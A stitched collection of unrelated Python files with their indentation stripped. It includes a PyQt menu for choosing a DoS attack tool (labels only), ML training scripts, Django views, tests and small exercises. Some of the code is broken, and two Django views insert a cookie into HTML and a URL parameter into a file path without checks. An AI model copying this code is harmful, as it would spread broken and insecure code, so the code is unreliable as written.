self.menubar.setGeometry(QtCore.QRect(0, 0, 471, 21))
self.menubar.setObjectName("menubar")
Dos_MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(Dos_MainWindow)
self.statusbar.setObjectName("statusbar")
Dos_MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(Dos_MainWindow)
QtCore.QMetaObject.connectSlotsByName(Dos_MainWindow)
def retranslateUi(self, Dos_MainWindow):
_translate = QtCore.QCoreApplication.translate
Dos_MainWindow.setWindowTitle(_translate("Dos_MainWindow", "DoS"))
self.label.setText(_translate("Dos_MainWindow", "Escolha o software para ataque DoS"))
self.l_dos1.setText(_translate("Dos_MainWindow", "DoS 1"))
self.l_dos2.setText(_translate("Dos_MainWindow", "DoS 2"))
self.btnDoSChoice.setText(_translate("Dos_MainWindow", "Escolher"))
self.btnDoSVoltar.setText(_translate("Dos_MainWindow", "Voltar"))
self.label_2.setText(_translate("Dos_MainWindow", "1 -"))
self.label_3.setText(_translate("Dos_MainWindow", "2 -"))
|
import math
A, B, C = input().split()
A = float(A)
B = float(B)
C = float(C)
Delta = (B*B) - (4*A*C)
if A == 0 or Delta < 0:
print('Impossivel calcular')
else:
x1 = (-B + math.sqrt(Delta))/(2*A)
x2 = (-B - math.sqrt(Delta))/(2*A)
print('R1 = {:.5f}'.format(x1))
print('R2 = {:.5f}'.format(x2))
|
"""
Dieses Programm trainiert das neuronale Netz.
Dafür werden die Daten aus dem "dataset"-Verzeichnis verwendet.
Verwendung: 'python3 train-netzwerk.py'
(am besten zusamen mit 'nice' ausführen, da das Training lange
dauert und sehr rechenintensiv ist)
"""
import sys
import os
import numpy as np
from keras.applications import VGG16
from keras.models import Sequential
from keras.layers.convolutional import Conv2D, MaxPooling2D
from keras.layers import Dropout, Flatten, Dense, Activation
from keras import callbacks
from keras import optimizers
from keras.preprocessing.image import ImageDataGenerator
np.random.seed(42)
DEV = False
argvs = sys.argv
argc = len(argvs)
if argc > 1 and (argvs[1] == "--development" or argvs[1] == "-d"):
DEV = True
if DEV:
epochs = 3
else:
epochs = 30
train_data_path = './data/train'
validation_data_path = './data/validation'
"""
Parameters
"""
img_width, img_height = 224, 224
input_shape = (img_width, img_height, 3)
batch_size = 32
samples_per_epoch = 2000
validation_samples = 235
filters1 = 32
filters2 = 64
conv1_size = 3
conv2_size = 2
pool_size = 2
classes_num = 3
lr = 0.0004
vgg16_net = VGG16(weights='imagenet', include_top=False, input_shape=(224, 224, 3))
vgg16_net.trainable = False
model = Sequential()
model.add(vgg16_net)
# Добавляем в модель новый классификатор
model.add(Flatten())
model.add(Dense(256))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(classes_num))
model.add(Activation('softmax'))
model.compile(loss = 'categorical_crossentropy',
optimizer = optimizers.RMSprop(lr=lr),
metrics = ['accuracy'])
train_datagen = ImageDataGenerator(
rescale=1. / 255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
test_datagen = ImageDataGenerator(rescale=1. / 255)
train_generator = train_datagen.flow_from_directory(
train_data_path,
target_size=(img_height, img_width),
batch_size=batch_size,
class_mode='categorical')
validation_generator = test_datagen.flow_from_directory(
validation_data_path,
target_size=(img_height, img_width),
batch_size=batch_size,
class_mode='categorical')
"""
Tensorboard log
"""
log_dir = './tf-log/'
tb_cb = callbacks.TensorBoard(log_dir=log_dir, histogram_freq=0)
cbks = [tb_cb]
model.fit_generator(
train_generator,
steps_per_epoch = samples_per_epoch // batch_size,
epochs = epochs,
verbose = 1,
workers = 1,
use_multiprocessing = False,
validation_data = validation_generator,
callbacks = cbks,
validation_steps = validation_samples // batch_size)
target_dir = './models/'
if not os.path.exists(target_dir):
os.mkdir(target_dir)
model.save('./models/model.h5')
model.save_weights('./models/weights.h5')
|
import random
from card import card
class deck:
"""
model of a deck
"""
def __init__(self):
"""
initialize deck object
"""
self.cardList = []
deck.generate(self)
def generate(self):
"""
generates a deck of 52 cards
:return: none
"""
for i in range(0,4):
for j in range(2,15):
if i == 0: #Heart suit
suit = "heart"
if i == 1: #Diamond suit
suit = "diamond"
if i == 2: #spade suit
suit = "spade"
if i == 3: #club suit
suit = "club"
self.cardList.append(card(j, suit))
random.shuffle(self.cardList)
def drawCard(self):
"""
draws a card from the deck
:return: card
"""
if self.cardList.__len__() != 0:
return self.cardList.pop()
else:
self = deck()
return self.cardList.pop()
def printDeck(self):
"""
prints deck of cards
:return: none
"""
for card in self.cardList:
card.printCard()
|
from estnltk_workflows.postgres_collections.argparse import get_arg_parser
from estnltk_workflows.postgres_collections.argparse import parse_args
from estnltk_workflows.postgres_collections.data_processing.tag_collection import tag_collection
|
import FWCore.ParameterSet.Config as cms
#PreselectionCuts = cms.EDFilter('SkimmingCuts',doMuonOnly=cms.bool(False))
#MuonPreselectionCuts = cms.EDFilter('SkimmingCuts',doMuonOnly=cms.bool(True))
NoPreselectionCuts = cms.EDFilter('SkimmingCuts',preselection=cms.untracked.string(""))
MuonPreselectionCuts = cms.EDFilter('SkimmingCuts',preselection=cms.untracked.string("Mu"))
ElePreselectionCuts = cms.EDFilter('SkimmingCuts',preselection=cms.untracked.string("Ele"))
DoubleMuPreselectionCuts = cms.EDFilter('SkimmingCuts',preselection=cms.untracked.string("DoubleMu"))
DoubleElePreselectionCuts = cms.EDFilter('SkimmingCuts',preselection=cms.untracked.string("DoubleEle"))
MuOrElePreselectionCuts = cms.EDFilter('SkimmingCuts',preselection=cms.untracked.string("MuOrElePre"))
EMuTvariablePreselectionCuts = cms.EDFilter('SkimmingCuts',preselection=cms.untracked.string("EMuTvariable"))
MuTauPreselectionCuts = cms.EDFilter('SkimmingCuts',preselection=cms.untracked.string("MuTau"))
|
#!/usr/bin/env python
import argparse
import inception
# Load model and categories at startup
model, synsets = inception.load_inception_model()
# Detect image with MXNet
image = inception.load_image('images/image1.jpg')
prob = inception.predict(image, model)
topN = inception.get_top_categories(prob, synsets)
#print(topN)
top1_message = inception.get_top1_message(topN)
print(top1_message)
def main():
parser = argparse.ArgumentParser()
parser.parse_args()
if __name__ == "__main__":
main()
|
with open("day7input.txt", "r") as f:
input_data = f.read()
progdict = {}
for line in input_data.split("\n"):
print(line)
arrow = line.find('>')
if arrow > 0:
children = line[arrow+2:].split(', ')
print(children)
parent = line[:arrow-2].split()[0]
weight = int(line[:arrow-2].split()[1].strip("()"))
progdict[parent] = (children, weight)
else:
child = line.split()[0]
weight = int(line.split()[1].strip("()"))
progdict[child] = (None, )
print(progdict)
class prog:
def __init__(self):
self.children = []
def totalweightonself:
if len(self.children) is 0:
return self.weight
else:
return sum(self.children) + self.weight
def arechildrenbalanced:
if len(set(self.children)) == 1:
return True
else:
return False
|
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def input(request):
return render(request,'base.html')
def add(request):
x=int(request.GET['t1'])
y=int(request.GET['t2'])
z=x+y
resp=HttpResponse("<html><body bgcolor=blue><h1>values submitted successfully</h1></body></html>")
resp.set_cookie('z',z,max_age=40)
#help(resp.set_cookie)
return resp
def display(request):
for a,b in request.COOKIES.items():
print(a,b)
if 'z' in request.COOKIES:
sum=request.COOKIES['z']
return HttpResponse("<html><body bgcolor=green><h1>Addition of two number is</h1></body></html>"+sum)
else:
return render(request,'base.html')
|
from behave import *
from fastapi import testclient
import api
from fastapi.testclient import TestClient
@given("que deseo sumar dos numeros")
def step_implementation(context):
context.app = TestClient(api.app)
@when('yo ingrese los numeros {num1} y {num2}')
def step_implementation(context, num1, num2):
context.api_response = context.app.get(f'/sumar?num1={num1}&num2={num2}')
print(context.api_response.status_code)
assert 200 == context.api_response.status_code
@then('El resultado {result} debe ser la suma de ambos')
def step_implementation(context, result):
assert str(result) == str(context.api_response.json().get('total'))
@given("que yo deseo restar dos numeros")
def step_implementation(context):
context.app = TestClient(api.app)
@when('yo inserte los numeros {num1} y {num2} para restar')
def step_implementation(context, num1, num2):
context.api_response = context.app.get(f'/restar?num1={num1}&num2={num2}')
print(context.api_response.status_code)
assert 200 == context.api_response.status_code
@then('El resultado {result} debe ser la diferencia de ambos')
def step_implementation(context, result):
assert str(result) == str(context.api_response.json().get('total'))
@given("deseo multiplicar dos numeros")
def step_implementation(context):
context.app = TestClient(api.app)
@when('yo provea los numeros {num1} y {num2} para multiplicar')
def step_implementation(context, num1, num2):
context.api_response = context.app.get(f'/multiplicar?num1={num1}&num2={num2}')
print(context.api_response.status_code)
assert 200 == context.api_response.status_code
@then('El resultado {result} debe ser la multiplicacion de ambos')
def step_implementation(context, result):
assert str(result) == str(context.api_response.json().get('total'))
@given("que yo deseo dividir dos numeros")
def step_implementation(context):
context.app = TestClient(api.app)
@when('yo someta los numeros {num1} y {num2} para dividir')
def step_implementation(context, num1, num2):
context.api_response = context.app.get(f'/dividir?num1={num1}&num2={num2}')
print("codigo GG", context.api_response.status_code)
assert 200 == context.api_response.status_code
@then('El resultado {result} debe ser la division de ambos')
def step_implementation(context, result):
assert str(result) == str(context.api_response.json().get('total'))
|
import numpy as np
from mnist import MNIST
import matplotlib.pyplot as plt
from sklearn.metrics import accuracy_score
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.data
from torch.autograd import Variable
import pandas as pd
mndata = MNIST('data')
np.set_printoptions(precision=2, suppress=True)
X_train, y_train = mndata.load_training()
X_test, y_test = mndata.load_testing()
X_train, y_train = np.array(X_train)/255, np.array(y_train)
X_test, y_test = np.array(X_test)/255, np.array(y_test)
BATCH_SIZE = 32
torch_X_train = torch.from_numpy(X_train).type(torch.LongTensor)
torch_y_train = torch.from_numpy(y_train).type(torch.LongTensor) # data type is long
# create feature and targets tensor for test set.
torch_X_test = torch.from_numpy(X_test).type(torch.LongTensor)
torch_y_test = torch.from_numpy(y_test).type(torch.LongTensor) # data type is long
# Pytorch train and test sets
train = torch.utils.data.TensorDataset(torch_X_train,torch_y_train)
test = torch.utils.data.TensorDataset(torch_X_test,torch_y_test)
# data loader
train_loader = torch.utils.data.DataLoader(train, batch_size = BATCH_SIZE, shuffle = False)
test_loader = torch.utils.data.DataLoader(test, batch_size = BATCH_SIZE, shuffle = False)
torch_X_train = torch_X_train.view(-1, 1,28,28).float()
torch_X_test = torch_X_test.view(-1, 1,28,28).float()
print(torch_X_train.shape)
print(torch_X_test.shape)
# Pytorch train and test sets
train = torch.utils.data.TensorDataset(torch_X_train,torch_y_train)
test = torch.utils.data.TensorDataset(torch_X_test,torch_y_test)
# data loader
train_loader = torch.utils.data.DataLoader(train, batch_size = BATCH_SIZE, shuffle = False)
test_loader = torch.utils.data.DataLoader(test, batch_size = BATCH_SIZE, shuffle = False)
def fit(model, train_loader):
optimizer = torch.optim.Adam(model.parameters())#,lr=0.001, betas=(0.9,0.999))
error = nn.CrossEntropyLoss()
EPOCHS = 5
model.train()
for epoch in range(EPOCHS):
correct = 0
for batch_idx, (X_batch, y_batch) in enumerate(train_loader):
var_X_batch = Variable(X_batch).float()
var_y_batch = Variable(y_batch)
optimizer.zero_grad()
output = model(var_X_batch)
loss = error(output, var_y_batch)
loss.backward()
optimizer.step()
# Total correct predictions
predicted = torch.max(output.data, 1)[1]
correct += (predicted == var_y_batch).sum()
#print(correct)
if ((batch_idx) % 50 == 0):
print('Epoch : {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}\t Accuracy:{:.3f}%'.format(
epoch, batch_idx*len(X_batch), len(train_loader.dataset), 100.*batch_idx / len(train_loader), loss.data, float(correct*100) / float(BATCH_SIZE*(batch_idx+1))))
class CNN(nn.Module):
def __init__(self):
super(CNN, self).__init__()
self.conv1 = nn.Conv2d(1, 32, kernel_size=5)
self.conv2 = nn.Conv2d(32, 32, kernel_size=5)
self.conv3 = nn.Conv2d(32,64, kernel_size=5)
self.fc1 = nn.Linear(3*3*64, 256)
self.fc2 = nn.Linear(256, 10)
def forward(self, x):
x = F.relu(self.conv1(x))
x = F.relu(F.max_pool2d(self.conv2(x), 2))
x = F.dropout(x, p=0.5, training=self.training)
x = F.relu(F.max_pool2d(self.conv3(x),2))
x = F.dropout(x, p=0.5, training=self.training)
x = x.view(-1,3*3*64 )
x = F.relu(self.fc1(x))
x = F.dropout(x, training=self.training)
x = self.fc2(x)
return F.log_softmax(x, dim=1)
cnn = CNN()
print(cnn)
it = iter(train_loader)
X_batch, y_batch = next(it)
print(cnn.forward(X_batch).shape)
fit(cnn,train_loader)
|
# -*- coding: utf-8 -*-
from .basic import index
from .feed import AtomFeed, RssFeed
app_name = 'yyfeed'
|
import random
import json
import torch
from model import NeuralNet
from nltk_utils import bag_of_words, tokenize
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
with open('intents.json', 'r') as json_data:
intents = json.load(json_data)
FILE = "data.pth"
data = torch.load(FILE)
input_size = data["input_size"]
hidden_size = data["hidden_size"]
output_size = data["output_size"]
all_words = data['all_words']
tags = data['tags']
model_state = data["model_state"]
model = NeuralNet(input_size, hidden_size, output_size).to(device)
model.load_state_dict(model_state)
model.eval()
def chat(msg):
a=""
while True:
sentence = msg
sentence = tokenize(sentence)
X = bag_of_words(sentence, all_words)
X = X.reshape(1, X.shape[0])
X = torch.from_numpy(X).to(device)
output = model(X)
_, predicted = torch.max(output, dim=1)
tag = tags[predicted.item()]
probs = torch.softmax(output, dim=1)
prob = probs[0][predicted.item()]
if prob.item() > 0.75:
for intent in intents['intents']:
if tag == intent["tag"]:
responses = intent['responses']
for ans in responses :
a=a+ans+'<br/>'
return(a)
else:
answer = "Sorry, but I don't understand your query; if you don't receive a response, please try to rephrase your question, or provide <a style=\"color:#00fff2\" href='https://forms.gle/kjCfXRA8u31hxeSs5' target='_blank'>feedback here.</a>"
return(answer)
|
#!/bin/env python
#using the wireframe module downloaded from http://www.petercollingridge.co.uk/
import mywireframe as wireframe
import pygame
from pygame import display
from pygame.draw import *
import time
import numpy
key_to_function = {
pygame.K_LEFT: (lambda x: x.translateAll('x', -10)),
pygame.K_RIGHT: (lambda x: x.translateAll('x', 10)),
pygame.K_DOWN: (lambda x: x.translateAll('y', 10)),
pygame.K_UP: (lambda x: x.translateAll('y', -10)),
pygame.K_EQUALS: (lambda x: x.scaleAll(1.25)),
pygame.K_MINUS: (lambda x: x.scaleAll( 0.8)),
pygame.K_q: (lambda x: x.rotateAll('X', 0.1)),
pygame.K_w: (lambda x: x.rotateAll('X', -0.1)),
pygame.K_a: (lambda x: x.rotateAll('Y', 0.1)),
pygame.K_s: (lambda x: x.rotateAll('Y', -0.1)),
pygame.K_z: (lambda x: x.rotateAll('Z', 0.1)),
pygame.K_x: (lambda x: x.rotateAll('Z', -0.1))}
class ProjectionViewer:
""" Displays 3D objects on a Pygame screen """
def __init__(self, width, height):
self.width = width
self.height = height
self.screen = pygame.display.set_mode((width, height))
pygame.display.set_caption('Wireframe Display')
self.background = (10,10,50)
self.wireframes = {}
self.displayNodes = True
self.displayEdges = True
self.nodeColour = (255,255,255)
self.edgeColour = (200,200,200)
self.nodeRadius = 3 #Modify to change size of the spheres
def addWireframe(self, name, wireframe):
""" Add a named wireframe object. """
self.wireframes[name] = wireframe
def run(self):
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
if event.key in key_to_function:
key_to_function[event.key](self)
self.display()
pygame.display.flip()
def display(self):
""" Draw the wireframes on the screen. """
self.screen.fill(self.background)
for wireframe in self.wireframes.values():
if self.displayEdges:
for edge in wireframe.edges:
pygame.draw.aaline(self.screen, self.edgeColour, (edge.start.x, edge.start.y), (edge.stop.x, edge.stop.y), 1)
if self.displayNodes:
for node in wireframe.nodes:
if node.visiblity:
pygame.draw.circle(self.screen, self.nodeColour, (int(node.x), int(node.y)), self.nodeRadius, 0)
def translateAll(self, axis, d):
""" Translate all wireframes along a given axis by d units. """
for wireframe in self.wireframes.itervalues():
wireframe.translate(axis, d)
def scaleAll(self, scale):
""" Scale all wireframes by a given scale, centred on the centre of the screen. """
centre_x = self.width/2
centre_y = self.height/2
for wireframe in self.wireframes.itervalues():
wireframe.scale((centre_x, centre_y), scale)
def rotateAll(self, axis, theta):
""" Rotate all wireframe about their centre, along a given axis by a given angle. """
rotateFunction = 'rotate' + axis
for wireframe in self.wireframes.itervalues():
centre = wireframe.findCentre()
getattr(wireframe, rotateFunction)(centre, theta)
def createCube(self,cube,X=[50,140], Y=[50,140], Z=[50,140]):
cube.addNodes([(x,y,z) for x in X for y in Y for z in Z]) #adding the nodes of the cube framework.
allnodes = []
cube.addEdges([(n,n+4) for n in range(0,4)]+[(n,n+1) for n in range(0,8,2)]+[(n,n+2) for n in (0,1,4,5)]) #creating edges of the cube framework.
for i in range(0,10):
for j in range(0,10):
for k in range(0,10):
allnodes.append((X[0]+(X[1]-X[0])/9 * i,Y[0]+(Y[1] - Y[0])/9 * j,Z[0] + (Z[1]-Z[0])/9 * k))
cube.addNodes(allnodes)
#cube.outputNodes()
self.addWireframe('cube',cube)
def findIndex(coords): #Send coordinates of the points you want lit up. Will convert to neede
indices = []
for nodes in coords:
x,y,z = nodes
index = x*100+y*10+z + 8
indices.append(index)
return indices
def findIndexArray(array): #Takes a 3-D numpy array containing bool of all the LED points.
indices = []
for i in range(0,10):
for j in range(0,10):
for k in range(0,10):
if(array[i][j][k] == 1):
index = i*100+j*10+ k + 8
indices.append(index)
return indices
def wireframecube(size):
if size % 2 == 1:
size = size+1
half = size/2
start = 5 - half
end = 5 + half - 1
cubecords = [(x,y,z) for x in (start,end) for y in (start,end) for z in range(start,end+1)]+[(x,z,y) for x in (start,end) for y in (start,end) for z in range(start,end+1)] + [(z,y,x) for x in (start,end) for y in (start,end) for z in range(start,end+1)]
return cubecords
def cubes(size):
if size % 2 == 1:
size = size+1
half = size/2
cubecords = []
for i in range(0,size):
for j in range(0,size):
for k in range(0,size):
cubecords.append((5-half+i,5-half+j,5-half+k))
return cubecords
if __name__ == '__main__':
pv = ProjectionViewer(400, 300)
allnodes =[]
cube = wireframe.Wireframe() #storing all the nodes in this wireframe object.
X = [50,140]
Y = [50,140]
Z = [50,140]
pv.createCube(cube,X,Y,Z)
YZface = findIndex((0,y,z) for y in range(0,10) for z in range(0,10))
count = 0
for k in range(1,150000):
if k%5000 ==2500:
count = (count+2)%11
cube.setVisible(findIndex(wireframecube(count)))
pv.run()
|
#!/usr/bin/python3
def multiple_returns(sentence):
return (len(sentence), sentence[0] if (sentence) else None)
|
string = "hello Tom, nice to meet you!"
def reverseString():
splittedArray = string.split(" ")
array = []
newstring = ""
for i in range(len(splittedArray)):
# array.pop()
if splittedArray[i].find(",")>-1:
print(f"before replace ,{splittedArray}")
splittedArray[i] = splittedArray[i].replace(",","")
print(f"after replace ,{splittedArray}")
myreversed =list(reversed(splittedArray[:i]))
for j in range(i):
newstring += myreversed[len(myreversed)-1:][0]
if splittedArray[j+1]:
newstring+ " "
newstring+=","
print(f"newstring={newstring}")
print(f"splittedArray={splittedArray}")
print(list(reversed(string.split(" "))))
reverseString()
|
"""This is the "main script" which will be run and from where the actual work will be done"""
from judge import upload
from judge import judge
from sites import tabroom
from sites import judge_phil
from global_vars import db
import getopt, sys
def remove_dup(arg):
name = arg.split(" ")
all_judges_first = db.child('judges').order_by_child('first_name').equal_to(name[0]).get().val().items()
all_judges_last = db.child('judges').order_by_child('last_name').equal_to(name[1]).get().val().items()
all_judges = [judge for judge in all_judges_last if judge in all_judges_first]
if len(all_judges) > 1:
print(arg, len(all_judges))
for jud in all_judges[1:]:
db.child('judges').child(jud[0]).remove()
def main(argv):
opts, args = getopt.getopt(argv,"upd:",['remove_all_dups', 'update-phil', 'get-id='])
for opt, arg in opts:
if opt == '--get-id':
#TODO Consider stroing jud id in firebase
name = arg.split(" ")
tb = tabroom()
for i in range(283, 57630):
print(i)
tb.query_for_judge(jud_id = i)
if tb.get_judge_name()[0].lower() == name[0].lower() and tb.get_judge_name:
print('jud_id is ' + str(i))
exit()
print('judge_not_found')
exit()
if opt == '--update-phil':
all_judges = list(db.child('judges').get().val().items())
print('downloaded')
tb = tabroom()
for key, data in all_judges:
try:
print(key, data['first_name'], data['last_name'])
if data['phil'].lower() == 'i love ashmita' or data['phil'].lower() == "no paradigm found":
print(' looking up paradigm')
if tb.update_judge_phil(data['first_name'], data['last_name']):
print('phil not found')
else:
print('phil found')
else:
print(' paradigm already known')
except:
print('fml')
exit()
if opt == '-p':
#Process uploads mode
all_new_ups = upload.get_all_new_uploads()
for up in all_new_ups:
try:
up.process()
except Exception as e:
#Assumes judge doesn't exist
# TODO: intelligent exceptions
fn, ls = up.get_value('firstName'), up.get_value('lastName')
judge.create_blank_judge(fn, ls)
if opt == '-u':
#Update mode = add info on all judges
tabroom.create_all_judges()
exit()
if opt == '-d':
#remove duplicates mode with arg as the "First Last" name
remove_dup(arg)
exit()
if opt == '--remove_all_dups':
all_judges = list(db.child('judges').get().val().items())
print('downloaded')
judges_data = [jud[1] for jud in all_judges]
print(len(all_judges))
for judge_data in judges_data:
remove_dup(judge_data['first_name'] + " " + judge_data['last_name'])
# names = [judge_data['first_name'] + " " + judge_data['last_name'] for judge_data in judges_data]
# for name in names:
# remove_dup(name) This fails with names = [judge_data['first_name'] + " " + judge_data['last_name'] for judge_data in judges_data]
#TypeError: string indices must be integers
exit()
if __name__ == "__main__":
main(sys.argv[1:])
|
from django.contrib import admin
from .models import Post
from .models import Post2
class PostAdmin(admin.ModelAdmin):
list_display=('title','author','created_date','published_date')
search_fields =('title',)
# Register your models here.
admin.site.register(Post,PostAdmin)
class PostAdmin2(admin.ModelAdmin):
list_display=('country_name','author','created_date','published_date')
search_fields =('country_name',)
# Register your models here.
admin.site.register(Post2,PostAdmin2)
|
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from django.views import generic
from django.template import loader
from django.core.paginator import Paginator
# Create your views here.
from .models import Messages
import os
import math
from django.http.response import Http404
def index(request):
template = loader.get_template('information/index.html')
context = {}
return HttpResponse(template.render(context,request))
def multiview(request,pagename):
FTP_UPLOAD_DIR = '/home/iskandar_amir/covid2/static/information/html/'
if os.path.exists(FTP_UPLOAD_DIR + pagename+".html"):
# if yes, then serve the page
with open(FTP_UPLOAD_DIR + pagename+".html") as f:
response = HttpResponse(f.read())
return response
else:
raise Http404
def cc(request):
template = loader.get_template('information/cc.html')
context = {}
return HttpResponse(template.render(context,request))
def dcc(request):
template = loader.get_template('information/dcc.html')
context = {}
return HttpResponse(template.render(context,request))
def pzc(request):
template = loader.get_template('information/pzc.html')
context = {}
return HttpResponse(template.render(context,request))
def messages(request, page=1):
length = 24
if(page<=0):
page=1
latest_message_list = Messages.objects.order_by('-timestamp')
paginator = Paginator(latest_message_list, 20)
page_obj = paginator.get_page(page)
context = {'latest_message_list': latest_message_list,
'page_obj':page_obj,
}
return render(request, 'information/messages.html', context)
# def messages(request, page=1):
# if(page<0):
# page=0
# the_message = Messages.objects.order_by('-timestamp')[page]
# context = {'the_message': the_message,
# 'prev_page':page-1,
# 'next_page':page+1 if len(latest_message_list)==length else 0,
# }
# return render(request, 'information/messages.html', context)
|
# usage: python USP_server_example.py <host> <port>
import sys
import os
import time
from unix_socket_protocol import USP_SERVER
def callback_func(json_str):
print(json_str)
if __name__ == "__main__":
server = USP_SERVER(sys.argv[1], callback_func, 10)
server.start_server()
print ("server started")
time.sleep(10)
print ("after 10s")
server.stop_server()
print ("server stopped")
|
"""
The file_utils module provides methods for accessing or manipulating the
filesystem.
"""
from ephemeral.definitions import ROOT_DIR
def get_relative_package_path():
"""Gets the relative path for the package useful to finding package relative
property files or other resources.
"""
return ROOT_DIR
|
def isPalindrome(s,i,j) :
d = [i for i in s[i:j+1]]
d.reverse()
d = ''.join(d)
if (d == s) :
return True
else :
return False
def PP (i , j) :
global s
if (i >= j) :
return 0
else :
if (isPalindrome(s,i,j)) :
return 0
else :
minimum = float('inf')
for k in range (i,j) :
c = PP(i,k) + PP(k+1,j) + 1
if (c < minimum) :
minimum = c
return minimum
N = int(input())
s = input()
c = PP(0,N-1)
print(c)
|
from django.conf.urls import patterns, include, url
import session_csrf
session_csrf.monkeypatch()
from django.contrib import admin
admin.autodiscover()
from django.views.decorators.cache import cache_page
from blog.views import IndexView
from blog.views import PostView
urlpatterns = patterns('',
# Examples:
url(r'^$', view=IndexView.as_view(), name='index', kwargs={"page_num": "1"}),
# url(r'^$', cache_page(24*60*60)(IndexView.as_view()), name='index'),
url(r'^page/(?P<page_num>[0-9]+)/$', IndexView.as_view(), name='page'),
# url(r'^(?P<year>[0-9]{4})/(?P<month>[0-9]{2})/(?P<day>[0-9]{2})/(?P<url_slug>[\w\W]+)/$', cache_page(24*60*60)(PostView.as_view()), name='post'),
url(r'^(?P<year>[0-9]{4})/(?P<month>[0-9]{2})/(?P<day>[0-9]{2})/(?P<url_slug>[\w\W]+)/$', PostView.as_view(), name='post'),
# url(r'^blog/', include('blog.urls')),
url(r'^_ah/', include('djangae.urls')),
# Note that by default this is also locked down with login:admin in app.yaml
url(r'^admin/', include(admin.site.urls)),
# url(r'^csp/', include('cspreports.urls')),
url(r'^auth/', include('djangae.contrib.gauth.urls')),
)
|
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__)))
del os
del sys
# from system import *
from _statistics import *
from _trig import *
from _basic import *
from _specialf import *
|
import turtle
turtle.pendown()
turtle.forward(100)
turtle.right(90)
turtle.forward(100)
tutle.right(90)
turtle.forward(100)
turle.right(90)
turtle.forward(100)
|
"""
Author: Nemanja Rakicevic
Date : January 2018
Description:
Load a model from the experiment directory and evaluate it on a
user defined test.
"""
import sys
import json
import logging
import argparse
import informed_search.tasks.experiment_manage as expm
def load_metadata(datapath):
"""Extract class experiment metadata."""
with open(datapath + '/experiment_metadata.json', 'r') as f:
args_dict = json.load(f)
return args_dict
def main_test(load_path, verbose, render):
"""Run model evaluation on test targets."""
load_task_kwargs = load_metadata(load_path)
load_task_kwargs.update(dict(render=render, verbose=verbose))
experiment = expm.ExperimentManager(
load_task_kwargs,
load_model_path=load_path)
# Allow evaluation of multiple test positions
while True:
# Input target position
while True:
try:
angle_s, dist_s = input(
"\nEnter TARGET: angle [deg], distance[m] >> ").split(",")
test_target = [float(angle_s), float(dist_s)]
break
except Exception as i:
print(i)
continue
# Evaluate given test position
_, _, test_stats = experiment.evaluate_single_test(test_target)
# Print outcome info
print("{} TEST TARGET (angle: {}; distance: {}) {}"
"\n - Trial outcome: {} [{}]; ball ({:4.2f},{:4.2f})"
"\n - Model polar error: {:4.2f}"
"\n - Euclidian error: {:4.2f}"
"\n - Polar error norm: {:4.2f}\n{}".format(
'-' * 7, angle_s, dist_s, '-' * 7,
test_stats['trial_outcome'], test_stats['fail_status'],
*test_stats['ball_polar'],
test_stats['model_polar_error'],
test_stats['euclid_error'],
test_stats['polar_error'], '-' * 50))
# Continue or exit
if input("\nEXECUTION DONE. "
"Enter to try again, or (q) to quit ") == 'q':
break
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-load', '--load_path',
default=None, required=True,
help="Path to the learned model file.")
parser.add_argument('-r', '--render',
default=False,
help="Show execution.")
parser.add_argument('-v', '--verbose',
default=0,
type=int,
help="Define verbose level\n"
"0: basic info\n"
"1: training - trial info\n"
"2: testing - parameter selection info\n"
"3: training and testing detailed info\n")
args = parser.parse_args()
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(name)-40s '
'%(levelname)-8s %(message)s',
handlers=[
logging.FileHandler(
'{}/test_target.log'.format(args.load_path)),
logging.StreamHandler()])
main_test(
load_path=args.load_path, render=args.render, verbose=args.verbose)
|
# -*- coding: utf-8 -*-
class MergeSort(object):
items = []
def __init__(self,items):
self.items = items
def sort(self,n):
def merge(self):
|
#!/usr/bin/python3
# variables.py by Bill Weinman [http://bw.org/]
# This is an exercise file from Python 3 Essential Training on lynda.com
# Copyright 2010 The BearHeart Group, LLC
def main():
#creates a tuple, immutable
x = (1,2,3)
print(type(x), x)
#can get each of the elements in an objet
for i in x:
print(i,end=", ")
print('\n')
#creates a list, mutable
y =[1,2,3]
y.insert(0,"FIRST!!")
y.append(5)
print(type(y),y)
s = 'string'
print(type(s),s[2:])
if __name__ == "__main__": main()
|
# Generated by Django 2.2.1 on 2019-07-10 12:46
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('notice', '0002_auto_20190710_2125'),
]
operations = [
migrations.RemoveField(
model_name='notice',
name='file',
),
]
|
import json,operator
from getting_old import imageProcess
from text_sentiment import textProcess
#format ['12312312',{'sad':'0.8'},{'angry':0.4}] ,['12312300',{'happy':'0.7'},{'surprise':0.2}] ,['12312310',{'disgust':'0.9'},{'angry':0.1}]]
from twitter import getTweets
import pickle
net_tweets=[]
def get_json(username):
json=getTweets(username,20)
tweet_all=[]
net_emotions_media=[]
for each_tweet in json:
emotions=None
if (each_tweet[2]!=''):
sentiment_image=imageProcess(each_tweet[2])
emotions=sentiment_image.get_emotions()
net_tweets.append(each_tweet[0])
sentiment_text=textProcess(each_tweet[0])
text_emotions=sentiment_text.get_json()
if text_emotions==None and emotions != None:
lists=emotions
elif emotions==None and text_emotions!= None:
lists=text_emotions
elif text_emotions == None and emotions==None:
lists=None
else:
lists= {key: emotions[key] + (9*text_emotions.get(key, 0)/3) for key in emotions.keys()}
print "***********"
print each_tweet[0]
if lists!=None:
lists=(sorted(lists.items(), key=operator.itemgetter(1),reverse=True))
lists=dict((x,y) for x,y in lists[:2])
print lists
net_emotions_media.append([each_tweet[1],lists])
#tweet_all.append(each_tweet[1],sentiment_text)
with open('outfile1', 'wb') as fp:
pickle.dump(net_tweets, fp)
return net_emotions_media
|
import numpy as np
start = 143
stop = 10000
n = np.arange(start, stop)
triangle = n*(n+1)/2
pentagon = n*(3*n-1)/2
hexagon = n*(2*n-1)
